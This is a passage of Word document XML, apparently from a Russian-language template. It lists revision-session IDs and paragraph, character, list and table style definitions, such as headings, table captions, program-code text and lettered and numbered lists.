    <w:rsid w:val="00551D43"/>
    <w:rsid w:val="005550B1"/>
    <w:rsid w:val="00574668"/>
    <w:rsid w:val="005748DC"/>
    <w:rsid w:val="005756D9"/>
    <w:rsid w:val="005767AF"/>
    <w:rsid w:val="00576CA1"/>
    <w:rsid w:val="00586201"/>
    <w:rsid w:val="005A5E0D"/>
    <w:rsid w:val="005A7204"/>
    <w:rsid w:val="005B286F"/>
    <w:rsid w:val="005B3DBE"/>
    <w:rsid w:val="005B432A"/>
    <w:rsid w:val="005B44F9"/>
    <w:rsid w:val="005B4704"/>
    <w:rsid w:val="005B56ED"/>
    <w:rsid w:val="005C04AC"/>
    <w:rsid w:val="005D02FF"/>
    <w:rsid w:val="005D06EC"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D4CC0"/>
    <w:rsid w:val="005D69E8"/>
    <w:rsid w:val="005E0763"/>
    <w:rsid w:val="005E3238"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005E6DAF"/>
    <w:rsid w:val="005F4567"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="005F731C"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="0060568B"/>
    <w:rsid w:val="006069F6"/>
    <w:rsid w:val="00612A45"/>
    <w:rsid w:val="00616DDC"/>
    <w:rsid w:val="006220C0"/>
    <w:rsid w:val="006228EF"/>
    <w:rsid w:val="00631BB3"/>
    <w:rsid w:val="00631CA8"/>
    <w:rsid w:val="006321C4"/>
    <w:rsid w:val="00633969"/>
    <w:rsid w:val="006360C2"/>
    <w:rsid w:val="00637337"/>
    <w:rsid w:val="00641104"/>
    <w:rsid w:val="00641EF2"/>
    <w:rsid w:val="006426CC"/>
    <w:rsid w:val="006503F5"/>
    <w:rsid w:val="006517AA"/>
    <w:rsid w:val="00655B00"/>
    <w:rsid w:val="00656D19"/>
    <w:rsid w:val="0066772D"/>
    <w:rsid w:val="00667964"/>
    <w:rsid w:val="0067343A"/>
    <w:rsid w:val="00673DEE"/>
    <w:rsid w:val="0067411A"/>
    <w:rsid w:val="0067413D"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="00674B61"/>
    <w:rsid w:val="00686109"/>
    <w:rsid w:val="00690377"/>
    <w:rsid w:val="00695601"/>
    <w:rsid w:val="006A27DB"/>
    <w:rsid w:val="006A4543"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006B7CA2"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D6D39"/>
    <w:rsid w:val="006E1CC0"/>
    <w:rsid w:val="006E2B77"/>
    <w:rsid w:val="006E3D3D"/>
    <w:rsid w:val="006E6B1F"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F1A62"/>
    <w:rsid w:val="006F36D4"/>
    <w:rsid w:val="006F3D5F"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="006F6ABD"/>
    <w:rsid w:val="00704FF1"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="007077EA"/>
    <w:rsid w:val="00710E2D"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="007120E7"/>
    <w:rsid w:val="007136EA"/>
    <w:rsid w:val="007201A0"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="0072556D"/>
    <w:rsid w:val="00736D66"/>
    <w:rsid w:val="00743B2A"/>
    <w:rsid w:val="00744D92"/>
    <w:rsid w:val="00751F9E"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="00762CD6"/>
    <w:rsid w:val="00766783"/>
    <w:rsid w:val="007704C1"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="0078005C"/>
    <w:rsid w:val="00780727"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00784EFD"/>
    <w:rsid w:val="007861FC"/>
    <w:rsid w:val="00792FC3"/>
    <w:rsid w:val="00795923"/>
    <w:rsid w:val="00796857"/>
    <w:rsid w:val="007A1F62"/>
    <w:rsid w:val="007A28B2"/>
    <w:rsid w:val="007B018B"/>
    <w:rsid w:val="007B07D7"/>
    <w:rsid w:val="007B46D8"/>
    <w:rsid w:val="007B5401"/>
    <w:rsid w:val="007B55FF"/>
    <w:rsid w:val="007B6402"/>
    <w:rsid w:val="007B7F85"/>
    <w:rsid w:val="007C1469"/>
    <w:rsid w:val="007C14F1"/>
    <w:rsid w:val="007C1561"/>
    <w:rsid w:val="007C1F2C"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007C7D9D"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D1C0A"/>
    <w:rsid w:val="007D229B"/>
    <w:rsid w:val="007D2873"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D6A24"/>
    <w:rsid w:val="007D6A81"/>
    <w:rsid w:val="007D6DEA"/>
    <w:rsid w:val="007D791F"/>
    <w:rsid w:val="007E38D1"/>
    <w:rsid w:val="007E47FC"/>
    <w:rsid w:val="007F0CC5"/>
    <w:rsid w:val="007F30FA"/>
    <w:rsid w:val="007F52B2"/>
    <w:rsid w:val="007F5BD1"/>
    <w:rsid w:val="007F6D14"/>
    <w:rsid w:val="00800C30"/>
    <w:rsid w:val="00803101"/>
    <w:rsid w:val="00803F25"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="008054E7"/>
    <w:rsid w:val="00806CA6"/>
    <w:rsid w:val="00813AFA"/>
    <w:rsid w:val="00813B6A"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="00832637"/>
    <w:rsid w:val="00833346"/>
    <w:rsid w:val="0083334A"/>
    <w:rsid w:val="00836407"/>
    <w:rsid w:val="00843410"/>
    <w:rsid w:val="008439DE"/>
    <w:rsid w:val="0084491C"/>
    <w:rsid w:val="00850637"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="008548EC"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="0085634F"/>
    <w:rsid w:val="008609A4"/>
    <w:rsid w:val="008711D7"/>
    <w:rsid w:val="008727BD"/>
    <w:rsid w:val="00873636"/>
    <w:rsid w:val="00873901"/>
    <w:rsid w:val="00875D5C"/>
    <w:rsid w:val="00877323"/>
    <w:rsid w:val="00885AEE"/>
    <w:rsid w:val="00893C5F"/>
    <w:rsid w:val="008A25D8"/>
    <w:rsid w:val="008A6570"/>
    <w:rsid w:val="008B114D"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008B7361"/>
    <w:rsid w:val="008C239A"/>
    <w:rsid w:val="008C2E5A"/>
    <w:rsid w:val="008D1DD2"/>
    <w:rsid w:val="008D1F92"/>
    <w:rsid w:val="008D295C"/>
    <w:rsid w:val="008D447E"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E27C1"/>
    <w:rsid w:val="008E46BC"/>
    <w:rsid w:val="008E687F"/>
    <w:rsid w:val="008F51DF"/>
    <w:rsid w:val="00903564"/>
    <w:rsid w:val="00914FC3"/>
    <w:rsid w:val="00916877"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00923DD7"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="00924874"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00935E8D"/>
    <w:rsid w:val="00940FF4"/>
    <w:rsid w:val="00943A11"/>
    <w:rsid w:val="0095229F"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="009627BF"/>
    <w:rsid w:val="009636CE"/>
    <w:rsid w:val="0096758C"/>
    <w:rsid w:val="00971DED"/>
    <w:rsid w:val="00983626"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00984BE2"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="00991894"/>
    <w:rsid w:val="00992A40"/>
    <w:rsid w:val="0099595E"/>
    <w:rsid w:val="00997D58"/>
    <w:rsid w:val="009A0FAC"/>
    <w:rsid w:val="009A39ED"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1581"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009B214F"/>
    <w:rsid w:val="009B2C75"/>
    <w:rsid w:val="009B3114"/>
    <w:rsid w:val="009B516C"/>
    <w:rsid w:val="009B54DC"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C13F6"/>
    <w:rsid w:val="009C236F"/>
    <w:rsid w:val="009C296D"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009E0F43"/>
    <w:rsid w:val="009E2988"/>
    <w:rsid w:val="009E2AE8"/>
    <w:rsid w:val="009E34B3"/>
    <w:rsid w:val="009E3B15"/>
    <w:rsid w:val="009E5A12"/>
    <w:rsid w:val="009E792C"/>
    <w:rsid w:val="009F0039"/>
    <w:rsid w:val="009F06EE"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F2BF0"/>
    <w:rsid w:val="009F3EC0"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="009F659B"/>
    <w:rsid w:val="009F6BFE"/>
    <w:rsid w:val="00A00313"/>
    <w:rsid w:val="00A0240B"/>
    <w:rsid w:val="00A053C4"/>
    <w:rsid w:val="00A1028C"/>
    <w:rsid w:val="00A140A2"/>
    <w:rsid w:val="00A15B9A"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A2569C"/>
    <w:rsid w:val="00A32BF3"/>
    <w:rsid w:val="00A339FE"/>
    <w:rsid w:val="00A355AE"/>
    <w:rsid w:val="00A366F1"/>
    <w:rsid w:val="00A431CF"/>
    <w:rsid w:val="00A5090F"/>
    <w:rsid w:val="00A519FC"/>
    <w:rsid w:val="00A51D44"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A67935"/>
    <w:rsid w:val="00A67FDB"/>
    <w:rsid w:val="00A72CAE"/>
    <w:rsid w:val="00A75E17"/>
    <w:rsid w:val="00A76C9A"/>
    <w:rsid w:val="00A82A41"/>
    <w:rsid w:val="00A85984"/>
    <w:rsid w:val="00A87CF9"/>
    <w:rsid w:val="00A967BD"/>
    <w:rsid w:val="00AA1FF4"/>
    <w:rsid w:val="00AA332A"/>
    <w:rsid w:val="00AB78F0"/>
    <w:rsid w:val="00AC455C"/>
    <w:rsid w:val="00AC58C2"/>
    <w:rsid w:val="00AC774B"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD09D5"/>
    <w:rsid w:val="00AD2D92"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE41F6"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AE6444"/>
    <w:rsid w:val="00AE689C"/>
    <w:rsid w:val="00AF025D"/>
    <w:rsid w:val="00AF0455"/>
    <w:rsid w:val="00AF0F0D"/>
    <w:rsid w:val="00AF1BA7"/>
    <w:rsid w:val="00AF291E"/>
    <w:rsid w:val="00AF2B25"/>
    <w:rsid w:val="00AF3519"/>
    <w:rsid w:val="00B048F1"/>
    <w:rsid w:val="00B07133"/>
    <w:rsid w:val="00B071AC"/>
    <w:rsid w:val="00B1295B"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B14128"/>
    <w:rsid w:val="00B22ABC"/>
    <w:rsid w:val="00B2417B"/>
    <w:rsid w:val="00B241E3"/>
    <w:rsid w:val="00B24F0D"/>
    <w:rsid w:val="00B34B03"/>
    <w:rsid w:val="00B43FCE"/>
    <w:rsid w:val="00B460F1"/>
    <w:rsid w:val="00B52692"/>
    <w:rsid w:val="00B5374B"/>
    <w:rsid w:val="00B539AC"/>
    <w:rsid w:val="00B543A0"/>
    <w:rsid w:val="00B621AD"/>
    <w:rsid w:val="00B64613"/>
    <w:rsid w:val="00B6695A"/>
    <w:rsid w:val="00B67ECB"/>
    <w:rsid w:val="00B70B41"/>
    <w:rsid w:val="00B7279A"/>
    <w:rsid w:val="00B85E65"/>
    <w:rsid w:val="00B912DB"/>
    <w:rsid w:val="00B92788"/>
    <w:rsid w:val="00B94B91"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BA0160"/>
    <w:rsid w:val="00BA2948"/>
    <w:rsid w:val="00BA34F3"/>
    <w:rsid w:val="00BA511C"/>
    <w:rsid w:val="00BA5EA6"/>
    <w:rsid w:val="00BB4541"/>
    <w:rsid w:val="00BC00E1"/>
    <w:rsid w:val="00BC0996"/>
    <w:rsid w:val="00BC2A59"/>
    <w:rsid w:val="00BC4A02"/>
    <w:rsid w:val="00BC4E73"/>
    <w:rsid w:val="00BD5000"/>
    <w:rsid w:val="00BD596B"/>
    <w:rsid w:val="00BD6F9F"/>
    <w:rsid w:val="00BD6FD9"/>
    <w:rsid w:val="00BD7BFC"/>
    <w:rsid w:val="00BE08B8"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BE624B"/>
    <w:rsid w:val="00BF3486"/>
    <w:rsid w:val="00C032BC"/>
    <w:rsid w:val="00C0558B"/>
    <w:rsid w:val="00C064F7"/>
    <w:rsid w:val="00C11060"/>
    <w:rsid w:val="00C1106E"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C36498"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C42015"/>
    <w:rsid w:val="00C4219A"/>
    <w:rsid w:val="00C425A1"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C47B3A"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C512BA"/>
    <w:rsid w:val="00C52126"/>
    <w:rsid w:val="00C53921"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C61593"/>
    <w:rsid w:val="00C631CA"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C66707"/>
    <w:rsid w:val="00C7350E"/>
    <w:rsid w:val="00C75BF1"/>
    <w:rsid w:val="00C76285"/>
    <w:rsid w:val="00C76E8B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C8133E"/>
    <w:rsid w:val="00C83BF0"/>
    <w:rsid w:val="00C8400A"/>
    <w:rsid w:val="00C9034C"/>
    <w:rsid w:val="00C92B9E"/>
    <w:rsid w:val="00C92F7B"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CA2D8B"/>
    <w:rsid w:val="00CA2FCB"/>
    <w:rsid w:val="00CA4FB7"/>
    <w:rsid w:val="00CA64E6"/>
    <w:rsid w:val="00CA6D21"/>
    <w:rsid w:val="00CA6FC8"/>
    <w:rsid w:val="00CB0E2D"/>
    <w:rsid w:val="00CB36B6"/>
    <w:rsid w:val="00CB3F17"/>
    <w:rsid w:val="00CB5A38"/>
    <w:rsid w:val="00CB7CE9"/>
    <w:rsid w:val="00CC17D4"/>
    <w:rsid w:val="00CC55B3"/>
    <w:rsid w:val="00CD1DE3"/>
    <w:rsid w:val="00CD4390"/>
    <w:rsid w:val="00CD6678"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CE2C1D"/>
    <w:rsid w:val="00CE3041"/>
    <w:rsid w:val="00CE605C"/>
    <w:rsid w:val="00CF36EC"/>
    <w:rsid w:val="00CF3A74"/>
    <w:rsid w:val="00CF3C8D"/>
    <w:rsid w:val="00CF536D"/>
    <w:rsid w:val="00D06AF7"/>
    <w:rsid w:val="00D0720C"/>
    <w:rsid w:val="00D10F68"/>
    <w:rsid w:val="00D116B2"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D16912"/>
    <w:rsid w:val="00D16FA5"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D258A7"/>
    <w:rsid w:val="00D26A34"/>
    <w:rsid w:val="00D27889"/>
    <w:rsid w:val="00D31DAF"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D476D4"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D5341C"/>
    <w:rsid w:val="00D609FB"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D621B2"/>
    <w:rsid w:val="00D6437B"/>
    <w:rsid w:val="00D67CA8"/>
    <w:rsid w:val="00D712AF"/>
    <w:rsid w:val="00D71BD9"/>
    <w:rsid w:val="00D740EB"/>
    <w:rsid w:val="00D76CFF"/>
    <w:rsid w:val="00D822E5"/>
    <w:rsid w:val="00D917EF"/>
    <w:rsid w:val="00D9379F"/>
    <w:rsid w:val="00D93DFA"/>
    <w:rsid w:val="00DA214F"/>
    <w:rsid w:val="00DA417D"/>
    <w:rsid w:val="00DB23BC"/>
    <w:rsid w:val="00DB37D5"/>
    <w:rsid w:val="00DB3853"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DC1090"/>
    <w:rsid w:val="00DC1720"/>
    <w:rsid w:val="00DC74A4"/>
    <w:rsid w:val="00DC7DCA"/>
    <w:rsid w:val="00DD1427"/>
    <w:rsid w:val="00DD1680"/>
    <w:rsid w:val="00DD5766"/>
    <w:rsid w:val="00DD5DD8"/>
    <w:rsid w:val="00DD762B"/>
    <w:rsid w:val="00DE0922"/>
    <w:rsid w:val="00DE4186"/>
    <w:rsid w:val="00DE5CBD"/>
    <w:rsid w:val="00DE69B7"/>
    <w:rsid w:val="00DE77D1"/>
    <w:rsid w:val="00E0191C"/>
    <w:rsid w:val="00E01AC1"/>
    <w:rsid w:val="00E04A9D"/>
    <w:rsid w:val="00E05FAE"/>
    <w:rsid w:val="00E06C9D"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E14683"/>
    <w:rsid w:val="00E2108B"/>
    <w:rsid w:val="00E232B4"/>
    <w:rsid w:val="00E25F81"/>
    <w:rsid w:val="00E31785"/>
    <w:rsid w:val="00E326F1"/>
    <w:rsid w:val="00E34DA4"/>
    <w:rsid w:val="00E45D07"/>
    <w:rsid w:val="00E50C88"/>
    <w:rsid w:val="00E608CF"/>
    <w:rsid w:val="00E63175"/>
    <w:rsid w:val="00E64059"/>
    <w:rsid w:val="00E66BBD"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E700AD"/>
    <w:rsid w:val="00E70DEF"/>
    <w:rsid w:val="00E76317"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E87CB3"/>
    <w:rsid w:val="00E91FFA"/>
    <w:rsid w:val="00E94673"/>
    <w:rsid w:val="00EA17C1"/>
    <w:rsid w:val="00EA1A18"/>
    <w:rsid w:val="00EA2997"/>
    <w:rsid w:val="00EA5084"/>
    <w:rsid w:val="00EA69F0"/>
    <w:rsid w:val="00EA7488"/>
    <w:rsid w:val="00EA7A82"/>
    <w:rsid w:val="00EB0E0A"/>
    <w:rsid w:val="00EB1CF4"/>
    <w:rsid w:val="00EB38E5"/>
    <w:rsid w:val="00EB479F"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC249B"/>
    <w:rsid w:val="00ED0ED6"/>
    <w:rsid w:val="00ED25A5"/>
    <w:rsid w:val="00ED5FA0"/>
    <w:rsid w:val="00ED78FB"/>
    <w:rsid w:val="00EE6574"/>
    <w:rsid w:val="00EF2F4F"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F00177"/>
    <w:rsid w:val="00F00385"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F04AC1"/>
    <w:rsid w:val="00F05A20"/>
    <w:rsid w:val="00F11705"/>
    <w:rsid w:val="00F1184A"/>
    <w:rsid w:val="00F11870"/>
    <w:rsid w:val="00F1606B"/>
    <w:rsid w:val="00F17E58"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F269DF"/>
    <w:rsid w:val="00F26B8F"/>
    <w:rsid w:val="00F30DBC"/>
    <w:rsid w:val="00F3102D"/>
    <w:rsid w:val="00F35736"/>
    <w:rsid w:val="00F366B0"/>
    <w:rsid w:val="00F4070D"/>
    <w:rsid w:val="00F42C40"/>
    <w:rsid w:val="00F440D7"/>
    <w:rsid w:val="00F45E35"/>
    <w:rsid w:val="00F5098C"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F53FBF"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F63AE5"/>
    <w:rsid w:val="00F64B51"/>
    <w:rsid w:val="00F65842"/>
    <w:rsid w:val="00F66355"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F71209"/>
    <w:rsid w:val="00F72023"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F75FCA"/>
    <w:rsid w:val="00F7699F"/>
    <w:rsid w:val="00F84CA8"/>
    <w:rsid w:val="00F86865"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00F93B53"/>
    <w:rsid w:val="00F94FED"/>
    <w:rsid w:val="00F953F8"/>
    <w:rsid w:val="00FA267A"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FA481E"/>
    <w:rsid w:val="00FA6EA6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FC11BD"/>
    <w:rsid w:val="00FC268A"/>
    <w:rsid w:val="00FD2035"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FD49C7"/>
    <w:rsid w:val="00FE1032"/>
    <w:rsid w:val="00FE14B8"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE36FD"/>
    <w:rsid w:val="00FE3AA8"/>
    <w:rsid w:val="00FE4784"/>
    <w:rsid w:val="00FE7711"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF00EF"/>
    <w:rsid w:val="00FF0892"/>
    <w:rsid w:val="00FF131A"/>
    <w:rsid w:val="00FF6364"/>
    <w:rsid w:val="00FF6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57C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E25F8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0"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="006426CC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="39"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
      </w:tabs>
      <w:jc w:val="center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E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="39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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="39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locked/>
    <w:rsid w:val="00E25F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link w:val="ae"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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">
    <w:name w:val="Название таблицы"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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rsid w:val="00E25F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1">
    <w:name w:val="Программный код"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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f3">
    <w:name w:val="Текст внутри таблицы"/>
    <w:basedOn w:val="a7"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="006426CC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E25F8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E25F8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E25F8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E25F8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E25F8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E25F81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E25F81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E25F81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7"/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="42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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4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4">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="32"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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7"/>
    <w:next w:val="a7"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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E25F81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E25F81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5">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af6">
    <w:name w:val="Электронная подпись Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="33"/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="31"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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9"/>
    <w:uiPriority w:val="60"/>
    <w:locked/>
    <w:rsid w:val="00E25F8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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="41"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="afb">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a9"/>
    <w:uiPriority w:val="59"/>
    <w:locked/>
    <w:rsid w:val="00E25F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c">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="ad"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afe"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff">
    <w:name w:val="Введение_заключение"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a7"/>
    <w:link w:val="aff0"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afe">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81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7"/>
    <w:link w:val="aff1"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="47"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Список_БУКВЫ"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="48"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Список_ЦИФРЫ"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff3"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="50"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="Список_2_уровня"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
